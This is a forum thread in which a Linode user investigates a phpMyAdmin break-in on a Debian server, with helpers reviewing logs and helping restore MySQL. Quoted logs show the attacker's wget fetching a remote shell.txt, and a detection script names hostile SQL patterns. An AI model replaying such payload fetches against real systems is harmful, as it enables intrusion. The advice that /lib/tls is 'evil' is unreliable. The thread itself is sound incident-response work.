Someone set up an FTP site on my Linode.
It looks like someone decided to exploit something on my system and set up an FTP site. Must have killed them with the small space. Regardless, it appears that they exploited it somehow using the www-data user that Debian set up. I am running testing. Does anyone know what could have been used to open the exploit? I want to patch it ASAP.
Thanks!
15 Replies
@tavella81:
Hello,
It looks like someone decided to exploit something on my system and set up an FTP site. Must have killed them with the small space. Regardless, it appears that they exploited it somehow using the www-data user that Debian set up. I am running testing. Does anyone know what could have been used to open the exploit? I want to patch it ASAP.
Thanks!
What web applications you have on your website? One of them may have a vulnerability some attacker used to gain access to your Linode.
@tavella81:
I'm thinking it was phpMyAdmin that allowed it. There was a file named old.php with mysql/mysql as the owner. I've removed it now. It looks like the person was using quite a few tools to mess with my system. I'm an idiot. Oh well... live and learn. I guess the best part is I have the IPs of the person who created/accessed it and of all the people who were downloading the software off of my system. I think I'm going to contact their ISPs.
Review your webserver logs, see what they did. I'd love to know what they exploited. I'm willing to spend a few minutes and review your webserver logs if you want.
http://www.avella.name/hack.tar
The tar is almost 26 megs. It includes their little toolkit. I found it because I did a ps -ax like I normally do and saw ./ftpd running... First clue that wasn't me... Thanks!
Oh! The old.php was in my /var/www directory with the owner of mysql:mysql.
```
[Fri Dec 30 19:22:42 2005] [error] [client 84.159.66.132] File does not exist: /var/www/avella/phpmyadmin/css/themes, referer: http://www.avella.name/phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right&js_isDOM=1
--19:22:59-- http://mitglied.lycos.de/oldmeal1/shell.txt
=> `shell.txt'
Resolving mitglied.lycos.de... 212.78.204.20
Connecting to mitglied.lycos.de|212.78.204.20|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5,211 (5.1K) [text/plain]
0K ..... 100% 34.71 KB/s
19:23:00 (34.71 KB/s) - `shell.txt' saved [5211/5211]
```
That's from your error log, can you tar up (and gzip please) your access log for 12/30/2005?
They may have exploited some portion of MySQL through phpMyAdmin, using a database called remoteshell:
```
84.159.66.132 - - [30/Dec/2005:19:21:57 -0500] "GET /phpmyadmin/sql.php?lang=de-utf-8&server=1&collationconnection=utf8generalci&db=remoteshell&goto=dbdetailsstructure.php&sqlquery=DROP+DATABASE+%60remoteshell%60&zerorows=Datenbank+%60remoteshell%60+wurde+gel%C3%B6scht.&goto=main.php&back=dbdetailsstructure.php&reload=1&purge=1&isjs_confirmed=1 HTTP/1.1" 200 6635 "
pmyadmin/dbdetailsstructure.php?lang=de-utf-8&server=1&collationconnection=utf8general_ci&db=remoteshell" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"
```
Then they restored a database dump via POST:
```
84.159.66.132 - - [30/Dec/2005:19:22:20 -0500] "POST /phpmyadmin/readdump.php HTTP/1.1" 200 4760 "
ralci&db=mysql&goto=dbdetailsstructure.php&dbquery_force=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"
```
And they did another database dump via POST, which somehow resulted in /old.php getting created.
Because access logs don't log POST data, I can't tell exactly what happened, but I can make an educated guess. The above wget command in the error logs was probably caused by phpmyadmin.css.php mis-parsing the contents of a database in MySQL. It looks like it may have made PHP execute some PHP code that resided in the remoteshell database.
Can you dump that database to a text file if you've still got it?
[will edit later with more info dug up]
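An added detection example, not code from this thread: a small Apache access-log scanner that flags the phpMyAdmin activity described above (requests from addresses that should not be using phpMyAdmin, databases the site does not own such as `remoteshell`, `DROP`/`INTO OUTFILE` in `sql_query`, and dump imports POSTed to readdump.php). The admin IP, the known-database list and the sample log lines are constructed assumptions modelled on the lines quoted in the thread.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined-log prefix, as in the lines quoted in this thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Databases the site is expected to use (assumption: tune for your site).
KNOWN_DBS = {"mysql", "information_schema", "wordpress"}
# Addresses allowed to reach phpMyAdmin at all (assumption: your own IP).
ADMIN_IPS = {"192.0.2.10"}
DANGEROUS_SQL = re.compile(r"\b(DROP|INTO\s+OUTFILE|LOAD_FILE|DUMPFILE)\b", re.I)

def analyse(line):
    """Return (reason, detail) findings for one access-log line, or []."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, method, url = m["ip"], m["method"], m["url"]
    parts = urlsplit(url)
    path = parts.path.lower()
    if "/phpmyadmin" not in path:
        return []
    # parse_qs decodes '+' and %XX, so %60remoteshell%60 becomes `remoteshell`.
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    findings = []
    if ip not in ADMIN_IPS:
        findings.append(("phpmyadmin-from-unexpected-ip", ip))
    db = q.get("db")
    if db and db not in KNOWN_DBS:
        findings.append(("unknown-database", db))
    # The thread's log shows "sqlquery"; phpMyAdmin itself uses "sql_query".
    sql = q.get("sql_query") or q.get("sqlquery")
    if sql and DANGEROUS_SQL.search(sql):
        findings.append(("dangerous-sql", sql))
    if method == "POST" and path.endswith(("/readdump.php", "/read_dump.php")):
        findings.append(("dump-import-via-post", ip))
    return findings

def scan(lines):
    """Group findings by client IP across a whole log."""
    report = {}
    for line in lines:
        for finding in analyse(line):
            report.setdefault(line.split(" ", 1)[0], []).append(finding)
    return report

# Constructed sample lines modelled on the ones quoted in this thread.
SAMPLE = [
    '84.159.66.132 - - [30/Dec/2005:19:21:57 -0500] "GET /phpmyadmin/sql.php?db=remoteshell&sql_query=DROP+DATABASE+%60remoteshell%60 HTTP/1.1" 200 6635 "-" "Mozilla/5.0"',
    '84.159.66.132 - - [30/Dec/2005:19:22:20 -0500] "POST /phpmyadmin/readdump.php HTTP/1.1" 200 4760 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [30/Dec/2005:09:00:00 -0500] "GET /phpmyadmin/main.php?db=wordpress HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
]
```

Run `scan(SAMPLE)` (or feed it real access-log lines); the attacker's address comes back with five findings and the admin's own request with none.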
```
Starting MySQL database server: mysqld...failed.
Please take a look at the syslog.
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)'
Check that mysqld is running and that the socket: '/var/run/mysqld/mysqld.sock' exists!
```
I rebooted my system to make sure that no other programs were running that I wasn't aware of…
If you have an idea as to how to restore the MySQL server, I'll give the dump. I'm off to bed right now since I have to be at work in 5 hours. Thanks for your help and I'll follow up tomorrow.
```
mysqldump -u root -p remoteshell > remoteshell.txt
```
(then enter your root MySQL password at the prompt)
Fortunately it restarted with a reboot.
I found a directory under /var/tmp/ that had no name but appeared to contain some sort of pseudo server.
It may be worth checking for this folder.
```
avella:~# mysqld
060103 19:13:11 InnoDB: Database was not shut down normally!
InnoDB: Starting crash recovery.
InnoDB: Reading tablespace information from the .ibd files...
InnoDB: Restoring possible half-written data pages from the doublewrite
InnoDB: buffer...
060103 19:13:12 InnoDB: Starting log scan based on checkpoint at
InnoDB: log sequence number 0 47300.
InnoDB: Doing recovery: scanned up to log sequence number 0 47346
InnoDB: Last MySQL binlog file position 0 79, file name /var/log/mysql/mysql-bin.000121
060103 19:13:12 InnoDB: Flushing modified pages from the buffer pool...
060103 19:13:12 InnoDB: Started; log sequence number 0 47346
060103 19:13:12 [ERROR] Fatal error: Can't open and lock privilege tables: Table 'mysql.host' doesn't exist
```
I'm lost... I don't want to potentially lose what they posted. How can I go about restoring my data?
@tavella81:
I've never done it before but I'll give it a try…. hold.
```
Starting MySQL database server: mysqld...failed.
Please take a look at the syslog.
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)'
Check that mysqld is running and that the socket: '/var/run/mysqld/mysqld.sock' exists!
```
I rebooted my system to make sure that no other programs were running that I wasn't aware of…
If you have an idea as to how to restore the MySQL server, I'll give the dump. I'm off to bed right now since I have to be at work in 5 hours. Thanks for your help and I'll follow up tomorrow.
Did you do "apt-get upgrade" recently? If so, check if /lib/tls exists. That is evil. You have to watch for it when you do an upgrade and remove it every time it shows up again.